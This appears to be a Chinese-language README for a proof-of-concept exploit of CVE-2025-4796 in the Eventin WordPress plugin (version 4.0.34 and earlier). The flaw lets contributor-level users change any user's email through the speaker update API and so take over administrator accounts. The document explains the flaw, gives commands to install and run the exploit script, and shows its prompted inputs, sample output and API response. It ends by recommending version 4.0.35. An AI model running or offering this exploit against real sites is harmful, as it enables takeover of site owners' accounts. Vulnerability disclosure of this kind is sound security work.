eventin <= 4.0.34 - 通过修改用户邮箱实现权限提升 / 对已验证的贡献者及以上角色的账户接管
Eventin WordPress 插件(<= 4.0.34)中的权限提升漏洞,允许任何贡献者及以上用户通过插件的演讲者更新 API 修改任意用户的邮箱。通过将管理员邮箱更改为攻击者控制的邮箱,攻击者可以重置密码并接管账户。
eventin\speaker\api\speakercontroller::update_item)Eventin 未正确验证请求更新的用户身份,也未检查其是否有权修改用户邮箱。贡献者及以上角色可以调用以下端点:
安装 requests:
pip install requests
运行脚本并根据提示输入所需值:
python3 CVE-2025-4796.py
[+] 关闭 SSL 验证警告
[+] 登录 WordPress
[+] 登录成功
[+] 获取 nonce 令牌
[+] 获取到 nonce 令牌:abcdef1234567890
[+] 发送更新演讲者邮箱的请求
[+] 更新操作成功
url:http://example.com
id:123
email:[email protected]
user:attacker
pass:yourpassword
{
"id": 123,
"email": "[email protected]",
"name": "Speaker Name",
...
}
Eventin 插件已在 4.0.35 版本中发布补丁。强烈建议网站管理员立即更新到此版本。该修复在 SpeakerController::update_item 函数中增加了额外的用户验证检查。